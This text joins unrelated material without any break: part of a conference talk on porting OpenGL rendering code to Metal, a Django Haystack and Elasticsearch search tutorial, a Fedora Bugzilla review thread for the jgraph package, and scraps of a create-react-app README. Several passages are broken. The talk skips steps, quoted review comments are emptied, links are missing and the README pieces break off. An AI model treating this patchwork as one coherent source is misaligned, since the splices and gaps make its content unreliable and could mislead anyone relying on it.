Let's take a look at our colorMap first. We can see this looks like a reasonable texture. And we can also see that our stairs are, like, in the upper half of this texture; however, if we were taking a look at our texture coordinate, we can see that we are sampling from the lower half. Let me quickly verify if this is the case. What we are going to do is to invert the y coordinate of our texture. We can now update our shaders -- looks reasonable -- and we can continue our execution. There, much better. This is a pretty common error that you will experience when porting from OpenGL to Metal. And, of course, the real fix is you go into your texture loading code and make sure your texture is loaded at the right origin so you don't have to do this fix in every shader. However, the combination of a feature-rich editor and mighty debugging tools will also help you finally port your games to Metal. Thank you very much. My colleague Sarah will now guide you through the rest of the slides.

Sarah Clawson: Thanks, Max. Hi, I'm Sarah Clawson. And I'm here to take you through the rest of the port from GL to Metal. So far in the life of a graphics app, we've gone through a lot of setup. We've got a window to render to, a way to get your commands to the GPU, and a set of resources and shaders ready to go.
Next up, we're going to talk about setting up the state for your render loop.
OpenGL has several key concepts when it comes to state management.
The vertex array object defines both the vertex attribute layout, as well as the vertex buffers. The program is a link combination of vertex and fragment shaders. And the framebuffer is a set of color and depth stencil attachments that your application intends to render to.
These state objects are created during initialization and are used throughout your frames.
Let's walk through an example to show how OpenGL manages state. Here we have a sample render loop where an OpenGL application binds a framebuffer, sets a program, and then makes other state modifications, like enabling depth, or face culling, or changing the colorMap before making a draw call. If you look at this same API trace from OpenGL's perspective, it has to track all these changes on each API call. And then when a draw call happens, it has to stop and validate to be sure that the previous changes to primitive assembly, depth state, rasterizer, and programmable stages are all compatible with each other. This validation can be super expensive.
And while OpenGL does try to minimize its negative impact, there's limited opportunity to do so. It is worth noting that the OpenGL state objects were ahead of the curve when they were first introduced. Framebuffer objects combined attached render targets, programs linked fragment and vertex shaders together, and vertex array objects were larger objects combining some of the vertex attribute API's and vertex buffer setup. But even with all these changes, although they yielded positive results, OpenGL still has to validate many things on a draw call, such as will the -- can the ColorMask help optimize the fragment shader? Is the fragment shader output compatible with the attached frame buffer? Is the vertex layout compatible with the bound program? Or are the attached render targets blendable?
And then you set all the state we just talked about, like vertex and fragment shaders, vertex information, pixel formats, and blend state. And then you take that descriptor and you create what is called a pipeline state object or PSO.
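A hedged Swift sketch of that descriptor-to-PSO flow (the shader names and formats are illustrative):

    let library = device.makeDefaultLibrary()!   // precompiled at build time

    let descriptor = MTLRenderPipelineDescriptor()
    descriptor.vertexFunction = library.makeFunction(name: "vertexShader")
    descriptor.fragmentFunction = library.makeFunction(name: "fragmentShader")
    descriptor.vertexDescriptor = vertexDescriptor   // vertex layout, as in a VAO
    descriptor.colorAttachments[0].pixelFormat = .bgra8Unorm
    descriptor.colorAttachments[0].isBlendingEnabled = false
    descriptor.depthAttachmentPixelFormat = .depth32Float

    // Validated once here (the call throws on error), then reused every frame.
    let pipelineState = try device.makeRenderPipelineState(descriptor: descriptor)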
This immutable object fully describes the render state. And what's great about it is that you create it once, have it validated for correctness, and then use it throughout your program. In a similar way, we combined all the depth and stencil-related settings into a depth/stencil state descriptor. And, again, it is a collection of all the depth/stencil state. And you take this descriptor and you create what's called a depth/stencil state object. This object is also immutable and used throughout your program. So the render loop we were looking at in OpenGL now looks like this in Metal. With all of the prevalidated state objects, there's no longer any state validation or tracking. Let's look through the comparison. In Metal, the render encoder is the start of a render pass, similar to binding your frame buffer. Now that your depth state is prebaked into an object, you simply set it on the renderEncoder.
The PipelineState object represents a combination of program shaders, VertexArray properties, and a pixelFormat. And it's also set on the renderEncoder.
And now the renderEncoder manages your rasterizer state directly.
And it's important to note here that there is still flexibility in your pipeline, as not everything is prebaked into your PipelineState object. Here's the list of state that we've just been discussing that you prebake into your PSO: State like vertex and fragment functions and pixel formats, etc. On the other hand, here's all the state that you still set while drawing -- state like primitive culling mode and direction, fill mode. Scissor and viewport areas are still set just like in OpenGL.
And ultimately, the draw calls remain the same. The main difference here is that instead of enabling new state, which could incur hidden validation costs, you simply swap out a new PipelineState object that had blending enabled in its descriptor.
I want to discuss one more possible optimization that you may have used in OpenGL in order to hide certain expensive operations. As an OpenGL developer, you may have seen that your render loop has an unexpected hiccup on the first draw call after making a bunch of state changes. And if this is the case, you probably use an optimization to hide that called shader pre-warming. In shader pre-warming, an application uses dummy draw calls for the most common GL programs in order to have OpenGL create all the state that's necessary ahead of time. If you were doing this in your engine already, then it's going to be very easy for you to replace it with PSO creation.
Now shader pre-warming in Metal is accomplished through creating separate PSO objects with different state enabled. First, you create your descriptor, and then you set all of the state up until the first draw call and create your first PipelineState object.
Then you can take that same descriptor, change a bit of state on it -- like here we're enabling blending -- and you create a second PipelineState object.
Both of these are prevalidated so that during draw time you can just swap them out between draw calls. Hopefully if you're porting from OpenGL to Metal, this is a straightforward change. Now, as we conclude the setup stage of our application, I'd like to bring up one of the main benefits of porting your app from OpenGL to Metal, and it is that it will start doing expensive operations less often. In OpenGL, your application would have to wait until draw time in order to do things like compile and link shaders or validate states, which means that these expensive operations happen many times per frame.
Once you port your app to Metal, your application moves these operations to different stages of its lifetime. With precompiled shaders, shader compilation has moved out of initialization and into build time so it's only done once. Then with PSO's, state definition is moved to content loading. So that leaves your draw time free to actually make draw calls. So now that we've completed the setup stage of your application, let's talk about using all these resources, shaders, and objects to render frames. In order to draw a single frame, your application needs to first update textures and buffers, then establish a render target to render to, and then make several render passes before finally presenting your work. Let's talk about updating resources. Typically, at least some resources have to be updated continuously throughout your render loop. Such examples are shader constants, vertex and index buffers, and textures. And these modifications can be accomplished between frames through synchronization between the GPU and the CPU.
A typical GL resource update can be any combination of the following calls: A buffer can be updated by the CPU; or you can update a buffer through the GPU via buffer-to-buffer copy.
Similarly, a texture can be updated by the CPU or it can be updated via texture-to-texture copy on the GPU. At a glance, Metal offers similar functionality.
But as Lionel mentioned earlier, the containers for buffers and textures are immutable and are created during initialization; however, their contents can be modified through any combination of the following. A buffer with shared or managed storage mode can be updated through its contents property on the CPU. And on the GPU, the blitEncoder is in charge of doing all data copying. And so you can update a buffer from the GPU via the copyFromBuffer methods on the blitEncoder.
Similarly, a texture with shared or managed storage mode can be updated on the CPU through its replaceRegion method. Or on the GPU, you can update a texture through the copyFromTexture methods on the blitEncoder. Note that storage mode matters here when it comes to these updates as only buffers and textures with shared or managed storage modes can be updated by the CPU. OpenGL managed the synchronization between the GPU and CPU for you, though sometimes at exorbitant costs to your application as it waited for one or the other to be done. In Metal, because you control how the memory is stored, you also control how and when the data is synchronized.
And this is true for both buffers and textures. If you port your GL app to Metal and only use a single buffer for your resource updates, the flow will look like this.
First, your CPU will update your resources during the setup of a render pass.
And then once complete, the buffer will be available for the GPU to consume during the execution of that render pass. However, while the GPU is reading from this buffer, the CPU may begin setting up for the following render pass and will need to update the same buffer, which is a clear race condition. So let's look at one approach to solve this problem.
A simple solution would be to commit this resource to the GPU with the waitUntilCompleted call on the commandBuffer it is used in. As we discussed earlier, this is similar to glFinish and it places a semaphore on all CPU work until the GPU is done executing the render pass that uses that buffer. After the execution is completed, a callback is received from the GPU, and this way you can ensure that your single buffer will not be stomped on by the CPU or the GPU.
However, as you can see, the CPU is idle while the GPU is executing, and the GPU is starved waiting for the CPU to commit work. So while this can be helpful for you at the beginning while you're working out these race conditions, it is not recommended to use waitUntilCompleted as it introduces latency into your program. Instead, an efficient way to synchronize your updates is to use two or more buffers depending on your application's needs so that the CPU can write to one while the GPU reads from another. Let's look at a simple triple buffering example. So here we start with the first resource ready to go for the -- to be consumed by the GPU. But instead of waitUntilCompleted, we just add a completion handler so that once the corresponding frame is finished on the GPU, it can let the CPU know that it is done. But now we don't have to wait for it to be done.
While the GPU is executing, with triple buffering the CPU can jump two updates ahead because it's writing into different buffers. So here we are with the frame done executing on the GPU, and this is where the completion handler comes in. It notifies that the GPU work is done and then returns the buffer to the buffer pool so that it can be used by the CPU in the next frame while the GPU continues execution. I think most developers will find that they'll need to implement triple buffering to achieve optimal performance.
As for implementation, for triple buffering, of course, you need to start with a queue of three buffers. You also need to initialize your frameBoundarySemaphore with a starting value of three. And this semaphore will be signaled at each frame boundary when the GPU is done executing, letting the CPU know that it is safe to override that buffer.
And finally, we need to initialize the buffer index to point at the current frame's buffer. Inside the render loop, before we write to a buffer, we need to ensure that the GPU is completely done executing the corresponding frame.
So at the beginning of each render pass, we need to wait on our frameBoundarySemaphore.
And then once the signal has been received, we know that it's safe to grab its buffer and reuse it for new frame data. And now we encode commands and bind this resource to the GPU to be used in the next frame. But before we commit it, we have to add our completion handler to the commandBuffer and then we commit it. And once the GPU has finished executing, our completion handler will signal our frame semaphore, allowing the CPU to know that it is done and it can reuse the buffer for the next frame's encoding.
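As a rough sketch in Swift (helper names like uniformBuffers and encodeRenderPass are assumed rather than taken from the talk), the loop just described looks like this:

import Dispatch

let maxFramesInFlight = 3
let frameBoundarySemaphore = DispatchSemaphore(value: maxFramesInFlight)
var frameIndex = 0

func drawFrame() {
    // Block until the GPU has finished with the oldest in-flight buffer.
    frameBoundarySemaphore.wait()
    let uniformBuffer = uniformBuffers[frameIndex]
    updateUniforms(uniformBuffer)              // CPU write is now safe

    let commandBuffer = commandQueue.makeCommandBuffer()!
    encodeRenderPass(commandBuffer, uniformBuffer)
    commandBuffer.addCompletedHandler { _ in
        // GPU is done with this frame; return the buffer to the pool.
        frameBoundarySemaphore.signal()
    }
    commandBuffer.commit()
    frameIndex = (frameIndex + 1) % maxFramesInFlight
}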
And this is a simple triple buffer implementation that you can adopt for any dynamic resource updates. Okay. So now we have our resources updated, so let's talk about render targets. In OpenGL, framebuffer objects are the destination for rendering commands. An FBO collects a number of textures and render buffer objects under one umbrella and facilitates rendering into them.
The state of a framebuffer is mutable, and the render pass is loosely outlined by binding a framebuffer and ultimately swapping them for display. This is a typical OpenGL workflow with framebuffers. During the application's initialization stage, a framebuffer is created. And then you make it current by binding it.
And then you attach resources like textures and then check the framebuffer status to make sure it's valid to use. During draw time, you make a framebuffer current by binding it, which is an implicit start to a render pass. And then you have to clear it before you make any draw calls to it. And then at the end you can signal that certain attachments can be discarded to let OpenGL know that it's not necessary to store these contents into memory. These discard events can serve as hints to end the render pass, but it's not a guarantee. In Metal, the render command encoder is the destination for rendering commands. A render command encoder is created from a render pass descriptor, which, similar to an FBO, collects a number of rendering destinations for a render pass and facilitates rendering into them.
A render command encoder is directly responsible for generating the hardware commands for your GPU, and a render pass is explicitly delineated by the starting and ending of encoders.
Here's a render pass in Metal. You start by creating your renderPassDescriptor.
And the renderPassDescriptor describes all the attached resources and also specifies the operations that happen at the beginning and end of a render pass -- these are called load and store actions. In contrast to GL, in Metal you do not clear a resource directly; instead, you specify a load action to clear it and also the color.
Here, it is black. The store action here is don't care, which is similar to GL discard framebuffer in our GL example. If you want to store the results to memory, you would use the store action here instead. And at render time, you use your descriptor to create your encoder so the state is set. You make all your draw calls and then explicitly end encoding. But before discarding framebuffers or ending encoding, let's actually draw something. A series of render commands is often referred to as a render pass. Inside the render pass, you set up state and draw call inputs like textures and buffers and then issue your draw commands. This is a typical OpenGL draw sequence. A well-behaved OpenGL app tries to set all of its state ahead of time, and then it binds its target and a GL program to link shaders.
Then it will bind resources such as vertex buffers, uniforms, and textures to different stages in the program. And finally, it will draw. As we've discussed a few moments ago, OpenGL state changes can cause hidden validation checks. And if you're already grouping your state changes together in OpenGL to avoid these performance hits, then you'll get the most out of Metal's pre-validated state objects. In Metal, because validation only happens when you create your PipelineState object and because shaders are precompiled, your render loop becomes much smaller. But for a programmer, there's not that many changes to do. Here is the same code that we looked at in OpenGL but now in Metal. You start with your render command encoder, which is an equivalent to setting the GL framebuffer. And then you set your prebuilt PipelineState object, which is equivalent to GL use program. And after that, we assign resources for our Metal program, starting with the VertexBuffer and uniforms.
And you can note here that you have to set your uniforms per shader stage, whereas in GL you set them once for the whole GL program. And here, because we ported it directly from OpenGL, we're sending the same set of uniforms; but in Metal you can send different ones if you want. And then you set your textures and issue the draw call.
And finally, once you've done all the draw calls, you can end your render pass.
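Putting those pieces together in Swift, a single pass looks roughly like this (a sketch; the drawable, commandBuffer, pipelineState, and buffers are assumed to exist):

let desc = MTLRenderPassDescriptor()
desc.colorAttachments[0].texture = drawable.texture
desc.colorAttachments[0].loadAction = .clear        // clear on load, like glClear
desc.colorAttachments[0].clearColor = MTLClearColor(red: 0, green: 0, blue: 0, alpha: 1)
desc.colorAttachments[0].storeAction = .dontCare    // use .store to keep the results

let encoder = commandBuffer.makeRenderCommandEncoder(descriptor: desc)!
encoder.setRenderPipelineState(pipelineState)       // the prevalidated PSO
encoder.setVertexBuffer(vertexBuffer, offset: 0, index: 0)
encoder.setFragmentTexture(texture, index: 0)
encoder.drawPrimitives(type: .triangle, vertexStart: 0, vertexCount: vertexCount)
encoder.endEncoding()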
And now, once the work is submitted, there's still the matter of presenting.
As the GPU renders the scene, it writes out to a framebuffer to display.
In OpenGL, in order to present a rendered frame, when you return from drawInRect, the context calls presentRenderbuffer for you. Metal, on the other hand, accomplishes this directly through Core Animation's pool of drawables.
And drawables are textures for on-screen display, and you can encode render passes that render to them. You fetch the current drawable, and then after your render loop tell the command buffer to present it. Remember our code from the very, very beginning of this talk when we were talking about the window subsystem.
Here we're going to dive into glkView and drawInMTKView to see how you can present what you've rendered. So here it is. In glkView you bind your framebuffer; perform your render commands; and then when you return from drawInRect, the present is managed for you. In Metal it's much the same: You create your commandBuffer, perform your render commands by creating ending encoders, and then the one extra step you have to take is to call presentDrawable yourself before finally committing your commandBuffer. And if your render loop is very simple with a single encoder, then this is all you have to do; however, if you do have a more complex app, you may want to check out the talk we have on delivering optimized Metal apps and games for how to handle your drawables. And that concludes our frame. So we've shown how the window subsystem can be migrated easily. We've gone over the resource creation steps. We've ported our shaders and used the great tools to quickly find issues. We created our render command queue, command buffers, and command encoders to set up our render passes. And we created our prevalidated state objects. Then to render each frame, we used triple buffering to update our resources. We used the render command encoders for our command -- for our render passes where we drew our geometry before ultimately presenting the rendered frame.
We've walked through the life of a graphics app and showed how Metal is a natural evolution.
Many of OpenGL's established concepts have migrated into Metal to work alongside new concepts that we've added to address specific problems raised in the graphics community.
If you can take one thing away from this session, we hope it's that porting your applications from OpenGL to Metal is not intimidating and that your application will actually benefit from it. But if you have room for two things, it's that Metal also offers an awesome set of tools to enhance your developing experience.
Max already demoed Xcode's built-in frame capture and shader debugger to offer deeper insight into subtle issues within your code. But Xcode also offers the new GPU memory viewer to understand and optimize how to use memory in your application.
In instruments we have a game performance template that includes the Metal system trace to visualize submission issues which might cause frame drops. And new this year we also have support for Metal in the simulator. Yay, you can get excited.
[laughs] New with Xcode 11 on macOS Catalina, we have full hardware acceleration to run your games and apps for iOS and tvOS simulator using Metal.
The simulator supports the MTLGPUFamilyApple2 feature set and should meet the majority of your needs to run all of your apps and games in all available screen resolutions.
For a deeper dive into the simulator and how it achieves hardware acceleration, please check out the simulator talk tomorrow morning. If you're looking to solve a specific issue with Metal, you can see our many, many sessions online.
For more information, you can check out our documentation on our website or you can visit us in the Metal lab tomorrow morning. And with that, thank you all for coming, and I hope to see you at the bash.
Search is one of the most important and powerful features in web applications these days. It helps users easily find content, products, and so on, on your website. Without a search option, users have to find their own way to the desired content, which no one likes to do. Just imagine Amazon without a search bar: you would have to navigate through various categories to find a product, and it might take you forever.

Elastic Search
Elastic search is a highly scalable Lucene-based search engine. It provides distributed, multitenant-capable full-text search with support for schemaless JSON documents. Elastic search achieves fast search responses because, instead of searching the text directly, it searches an index. It also provides a RESTful API, and almost any action can be performed using JSON over HTTP. More details on elastic search can be found on its official page.
Haystack
Haystack is a django app which provides modular search and supports various backends like elastic search, whoosh, solr, etc. It provides a unified API so that the underlying backend can be changed if required without needing to modify the code.
Setting up haystack and elastic search
Installing haystack
Haystack can be installed via pip. After installation, just add it to your installed apps.
pip install django-haystack

INSTALLED_APPS = [
    ....
    'haystack',
    ...
]
Installing Elastic search
Download elastic search from its official website. After downloading the file, unzip it and navigate to the bin directory. You can run the elastic search executable to start the elastic search server with the default config. Just hit 127.0.0.1:9200 in your browser to check whether your elastic search server is up or not.
You can also specify your own config file while starting elastic search server using the following command
elasticsearch --config=<PATH_TO YOUR_CONFIG_FILE>/elasticsearch.yml
You will also need to install the elastic search python binding to get it working with haystack:
pip install elasticsearch
Modifying django configuration to specify haystack backend
Once this is done, you need to modify the django settings file and specify the search backend.
HAYSTACK_CONNECTIONS = {
    'default': {
        'ENGINE': 'haystack.backends.elasticsearch_backend.ElasticsearchSearchEngine',
        'URL': 'http://127.0.0.1:9200/',
        'INDEX_NAME': 'haystack',
    },
}
That's it, your django website is now running with haystack and elastic search. Now that the setup is done, let's see how to use them in the next section.
Working with Search Indexes
First you need to create an index (SearchIndex) so that haystack knows what to search on. SearchIndex objects are the way Haystack determines what data should be placed in the search index. SearchIndexes are field-based and manipulate/store data much like Django models.
Lets assume we have a blog model with the following model attributes.
from django.db import models
from django.contrib.auth.models import User

class Blog(models.Model):
    user = models.ForeignKey(User)
    pub_date = models.DateTimeField()
    title = models.CharField(max_length=200)
    body = models.TextField()

    def __unicode__(self):
        return self.title
Creating Search Indexes
Now we want to build search functionality for this blog model with the capability to search the blog's title, body, and author name. The first step is to create the SearchIndex, as outlined below.
import datetime
from haystack import indexes
from myapp.models import Blog

class BlogIndex(indexes.SearchIndex, indexes.Indexable):
    text = indexes.CharField(document=True, use_template=True)
    author = indexes.CharField(model_attr='user')
    pub_date = indexes.DateTimeField(model_attr='pub_date')

    def get_model(self):
        return Blog

    def index_queryset(self, using=None):
        """Used when the entire index for model is updated."""
        return self.get_model().objects.filter(pub_date__lte=datetime.datetime.now())
Understanding Search Index
Every SearchIndex requires there be one (and only one) field with document=True. This indicates the primary search field to both Haystack and the search engine. Additionally, we're providing use_template=True on the text field. This allows us to use a data template (rather than error-prone concatenation) to build the document for the search engine to index. The template is a simple text file, and everything you want to be available for search should go in it. Just create a new file named blog_text.txt inside your template directory with the following content:
# templates/search/indexes/myapp/blog_text.txt
{{ object.title }} {{ object.user.get_full_name }} {{ object.body }}
Here we have included the blog title, the author name, and the blog body in the search document.
Note that we have added author and pub_date fields as well in the BlogIndex. These are useful if you want to do additional filtering on your search results.
We have also specified a custom index_queryset to only allow indexing of blogs whose publication date is not later than the present date. This is done to prevent indexing of blogs which are not yet published. You can put any condition in this method and control exactly what you want to be indexed.
That’s it, now run the following command to build the index
./manage.py rebuild_index
This will build the index. There are other commands as well, like clear_index and update_index, which you will need later; a full reference is given on the official haystack documentation page.
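For example (assuming your SearchIndex implements get_updated_field), you can re-index only the objects that changed in the last 24 hours, which is handy in a cron job:

./manage.py update_index --age=24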
Querying Data
Now that your search is set up and the index is built, it's time to query the data you need. Haystack has a very good API for querying data and is a lot like the django ORM in terms of usage and the functions provided.
Haystack provides the SearchQuerySet class to make performing a search and iterating over its results easy and consistent. Let's search for the content “haystack with elastic search” using the index built previously.
from haystack.query import SearchQuerySet results = SearchQuerySet().filter(content='haystack with elastic search')
The results can be iterated over for individual items as well, as shown below:
for item in results:
    author = item.author
    ....
Often, if you have multiple SearchIndex classes, it's better to specify which models to search in order to speed up the search, as shown below:
from haystack.query import SearchQuerySet results = SearchQuerySet().models(Blog).filter(content='haystack with elastic search')
You can also filter on other fields in the SearchIndex class, and use order_by, values, values_list, and other options. Have a look at the official documentation for more details on the SearchQuerySet API.
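For instance, using the BlogIndex fields defined above (a hypothetical illustration; the author name is made up), you could narrow the results to a given author and sort by publication date:

from haystack.query import SearchQuerySet
from myapp.models import Blog

results = SearchQuerySet().models(Blog) \
    .filter(content='haystack with elastic search') \
    .filter(author='john') \
    .order_by('-pub_date')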
That's it for this tutorial. I will talk about using autocomplete, spelling suggestions, custom backends, and other functionality of haystack and elastic search in the second part of this tutorial.
I hope you find this article helpful. Let me know if you have any suggestions/ feedback in the comments section below.
Fun Fact: Game of Thrones season 6 is back, and its episode 4 is also titled “Book of the Stranger”
Red Hat Bugzilla – Full Text Bug Listing
SPEC:
SRPM:
Description:
JGraph is a lightweight and feature-rich graph component
for Java. It provides automatic 2D layout and routing for diagrams.
Objects and relations can be displayed in any Swing UI via the provided
zoomable component. It is accompanied by a diagram editor, JGraphpad.
jgraph.spec:135: W: libdir-macro-in-noarch-package (main package) %attr(-,root,root) %{_libdir}/gcj/%{name}
Rpmlint is incorrect here: it fails to detect the %if conditional around the noarch. So no problems here.
So rpmlint output is OK.
===
Items to be addressed:
===
> >
>This is pretty much irrelevant to this package review.
I believe it may be relevant, as otherwise your -debuginfo package is broken. There are workarounds shown in both that bug (bug 472292) and in bug 191014. Please fix this.
It is not always clear why a given version will fail (sometimes deps are missing, sometimes the compiler crashes, sometimes the documentation build fails, or whatever may be the case).
Providing scratch builds provides assurance that this is not the case. I prefer not to review packages which may fail to work under any given F- distribution that is not near EOL.
Note the following SHOULD from the package review checklist:
"SHOULD: The package should compile and build into binary rpms on all supported architectures."
>I prefer not using dos2unix for endline conversion
>This is a matter of taste and I'd prefer to follow packager's one, thus no
>change here.
Fair enough.
> > Fully standards-compliant (What standard? ISO 9001? Why do I (user) care?)
> Interoperability?
Apologies for the following rant, feel free to skip it as the current description is good :)
-- BEGIN RANT --
ISO9000 and friends have nothing to do with interoperability. They are workplace quality-system ISOs, and really have nothing to do with software (or anything, really). They were popular a few years ago amongst marketing and manager types. It is entirely possible that upstream is simply being facetious here, as actual accreditation is a long and complex (and quite boring) procedure, which individual developers would be unlikely to undertake.
-- END RANT --
===
Oh sorry, one more comment.
Please re-instate the changelog entry by Mary, which looks to have been inadvertently deleted
+- Added gcj stuff
This should be inserted after line 160.
(In reply to comment #1)
>.
Might be. I replaced this with Documentation, just to be on the safe side.
> >This is pretty much irrelevant to this package review.
>
> I believe it may be relevant, as otherwise your -debuginfo package is broken.
> There are workarounds shown in both that bug (bug 472292) and in bug 191014.
> Please fix this.
Ah, sorry, you're right. I thought this was common to all Java packages, not this package's fault. Addressed in new version.
>.
I do not need this anywhere < Fedora 13. Common practice is that if anyone else needs this, he maintains it there. Therefore, if you need the package in F-12, F-11 or even F-10, feel free to maintain it there yourself (once it's in), but the maintenance burden is on your shoulders :) That means -- it's waste of bandwidth and builders cpu cycles from my point of view, since I don't care :)
> > > Fully standards-compliant (What standard? ISO 9001? Why do I (user) care?)
>
> > Interoperability?
>
> Apologies for the following rant, feel free to skip it as the current
> description is good :)
I won't pretend I knew what ISO 9001 is :)
New package:
SPEC:
SRPM:
scratch build:
*** Bug 252084 has been marked as a duplicate of this bug. ***
*** Bug 472793 has been marked as a duplicate of this bug. ***
Hello,
I started reviewing this, and noticed that upstream have just undergone some changes, which I think we need to track. In particular a project called "jgraphx" (aka jgraph-6 apparently) has been released by the author.
For now, please update to jgraph-5.13.
Unfortunately I am still getting those debuginfo errors with your latest SRPM.
Oh and note that the author has relicenced under BSD for 5.13.
(In reply to comment #6)
> For now, please update to jgraph-5.13.
Good catch, thank you.
Done.
>
You're completely right. Given how strong the tendency of Java programmers is to completely redesign APIs and namespace hierarchies, it's not uncommon (in fact it is very common) to keep older versions of packages as long as they are being depended on and to package new ones under another name (see junit - junit4, saxon - saxon8 (jpackage), etc., not even bothering to follow the -compat package naming). I currently have no need to package jgraphx, but as you correctly noted, that would really be handled separately.
> Unfortunately I am still getting those debuginfo errors with your latest SRPM.
Did -debuginfo generate correctly for you? For me, and in the scratch build as well, it did. Please don't be confused by the complaints about problems finding files with dollar sign characters ("$") in their file names -- they're really not to be found; it's just a result of how find-debuginfo determines the .java file paths from the .class-es embedded in jars.
(In reply to comment #7)
> Oh and note that the author has relicenced under BSD for 5.13.
Changed.
New package:
SPEC:
SRPM:
scratch build:
Key:
[+] - OK
[N] - Not applicable
[!] - Attention required
[+] MUST: rpmlint must be run on every package. The output should be posted in the review.
==
$ cat tmp
Wrote: /home/makerpm/rpmbuild/RPMS/i386/jgraph-5.13.0.0-1.fc10.i386.rpm
Wrote: /home/makerpm/rpmbuild/RPMS/i386/jgraph-javadoc-5.13.0.0-1.fc10.i386.rpm
Wrote: /home/makerpm/rpmbuild/RPMS/i386/jgraph-debuginfo-5.13.0.0-1.fc10.i386.rpm
$ rpmlint `cat tmp | awk '{print $2}'`
3 packages and 0 specfiles checked; 0 errors, 0 warnings.
$ rpmlint jgraph.spec
jgraph.spec:139: W: libdir-macro-in-noarch-package (main package) %attr(-,root,root) %{_libdir}/gcj/%{name}
0 packages and 1 specfiles checked; 0 errors, 1 warnings.
$ sudo rpm -i ../RPMS/i386/jgraph-5.13.0.0-1.fc10.i386.rpm
$ sudo rpm -i ../RPMS/i386/jgraph-javadoc-5.13.0.0-1.fc10.i386.rpm
$ rpmlint jgraph jgraph-javadoc
2 packages and 0 specfiles checked; 0 errors, 0 warnings.
==
rpmlint is wrong here, as discussed earlier. So OK
[+] MUST: The sources used to build the package must match the upstream source, as provided in the spec URL. Reviewers should use md5sum for this task.
$ md5sum jgraph-5.13.0.0-bsd-src.jar
16b0e3af6c5ac3e776d9c95e9a1f54fe jgraph-5.13.0.0-bsd-src.jar
SRPM:
16b0e3af6c5ac3e776d9c95e9a1f54fe jgraph-latest-bsd-src.jar
OK
[+] MUST: The package MUST successfully compile and build into binary rpms on at least one primary architecture.
[!] MUST: All build dependencies must be listed in BuildRequires, except for any that are listed in the exceptions section of the Packaging Guidelines; inclusion of those as BuildRequires is optional. Apply common sense.
Am I being a bit dense, or is there a "Requires: java" missing?
[N] MUST: The spec file MUST handle locales properly. This is done by using the %find_lang macro. Using %{_datadir}/locale/* is strictly forbidden.
[N] MUST: Every binary RPM package (or subpackage) which stores shared library files (not just symlinks) in any of the dynamic linker's default paths, must call ldconfig in %post and %postun.
[+] MUST: Packages must NOT bundle copies of system libraries.
[N] MUST: Header files must be in a -devel package.
[N] MUST: Static libraries must be in a -static package.
[N] MUST: Packages containing pkgconfig(.pc) files must 'Requires: pkgconfig' (for directory ownership and usability).
[N] MUST: If a package contains library files with a suffix (e.g. libfoo.so.1.1), then library files that end in .so (without suffix) must go in a -devel package.
[N] MUST: In the vast majority of cases, devel packages must require the base package using a fully versioned dependency: Requires: %{name} = %{version}-%{release}
[N] MUST: Packages must NOT contain any .la libtool archives, these must be removed in the spec if they are built.
).
[+] MUST: All filenames in rpm packages must be valid UTF-8.
[N] SHOULD: If the source package does not include license text(s) as a separate file from upstream, the packager SHOULD query upstream to include it.
[N] SHOULD: The description and summary sections in the package spec file should contain translations for supported Non-English languages, if available.
[+] SHOULD: The reviewer should test that the package builds in mock.
Koji:
F11:
F12:
[+] SHOULD: The package should compile and build into binary rpms on all supported architectures.
We have koji builds for F11, F12.
[!] SHOULD: The reviewer should test that the package functions as described.
[N] SHOULD: If scriptlets are used, those scriptlets must be sane. This is vague, and left up to the reviewers judgement to determine sanity.
[+] SHOULD: Usually, subpackages other than devel should require the base package using a fully versioned dependency.
[N] SHOULD: If the package has file dependencies outside of /etc, /bin, /sbin, /usr/bin, or /usr/sbin consider requiring the package which provides the file instead of the file itself.
If you fix these issues, then I will approve the package.
>If you fix these issues, then I will approve the package.
Just to clarify, I am not a sponsor. I will be happy with the review, however.
Thanks for your time and review.
(In reply to comment #9)
> [!] MUST: All build dependencies must be listed in BuildRequires, except for
> any that are listed in the exceptions section of the Packaging Guidelines ;
> inclusion of those as BuildRequires is optional. Apply common sense.
> Am I being a bit dense, or is there a "Requires: java" missing?
You're right. In fact, I the package should depend on jpackage-utils since it owns /usr/share/java this package used. Added a dependency on jpackage-utils, it also depends on java so it's not necessary to list it twice.
> [!].
I'm quite reluctant to do this since it's extra work for virtually no benefit (and just a SHOULD, not a MUST). It's not a common practice either. If you insist on verifying functionality, I suggest you try to build something that depends on it (say, microba, see bug #532205). It would be rather uncommon for a Java library not to function once it compiles, though.
(In reply to comment #10)
> >If you fix these issues, then I will approve the package.
> Just to clarify, I am not a sponsor. I will be happy with the review, however.
I am already sponsored (in fact, I'm a sponsor), so I don't need a sponsor to review packages. Anyone who's in the packager group (e.g. you) can review my packages (this ticket would block FE_NEEDSPONSOR if I needed a sponsor).
New package:
SPEC:
SRPM:
I've managed to get the examples to work in jgraph, with your current SRPM, so this package is APPROVED.
Thank you! (I'm also creating F-11 and F-12 branches as you requested and will orphan them as soon as they are created. Feel free to take them in pkgdb then).
By the way, you seem to have forgotten to set the review flag to '+'. Please do so when you approve the package.
New Package CVS Request
=======================
Package Name: jgraph
Short Description: Java-based Diagram Component and Editor
Owners: lkundrak
Branches: F-11 F-12 EL-5
Sorry, but this ticket isn't assigned to anyone, is still in NEW state, and the fedora-review flag is unset. It doesn't look like it's quite time for CVS.
CVS done.
Imported and built.
Thank you for Review and CVS.
(orphaning in F-11 and F-12, feel free to pick it up)
src/index.js is the JavaScript entry point.
You can delete or rename the other files.
You may create subdirectories inside src. For faster rebuilds, only files inside src are processed by Webpack. You need to put any JS and CSS files inside src, or Webpack won't see them.
Displaying Lint Output in the Editor
Note: this feature is available with react-scripts@0.2.0.
A note for Atom linter-eslint users: if you are using the Atom linter-eslint plugin, make sure that the Use global ESLint installation option is checked.
There is currently no support for preprocessors such as Less, or for sharing variables across CSS files.
Adding Images and Fonts
With Webpack, using static assets like images and fonts works similarly to CSS.
You can import an image right in a JavaScript module. This tells Webpack to include that image in the bundle. Unlike CSS imports, importing an image or a font gives you a string value. This value is the final image path you can reference in your code. However, it may not be portable to some other environments, such as Node.js and Browserify. If you prefer to reference static assets in a more traditional way outside the module system, please let us know in this issue.

Adding Custom Environment Variables

These environment variables will be defined for you on process.env. For example, having an environment variable named REACT_APP_SECRET_CODE will be exposed in your JS as process.env.REACT_APP_SECRET_CODE, in addition to process.env.NODE_ENV.
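For instance, a minimal (hypothetical) component reading such a variable could look like this:

function SecretBadge() {
  // REACT_APP_SECRET_CODE must be set when `npm start` or `npm run build` runs.
  return <small>Code: {process.env.REACT_APP_SECRET_CODE}</small>;
}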
Testing Components

You can write a smoke test with enzyme, too:

npm install --save-dev enzyme react-addons-test-utils

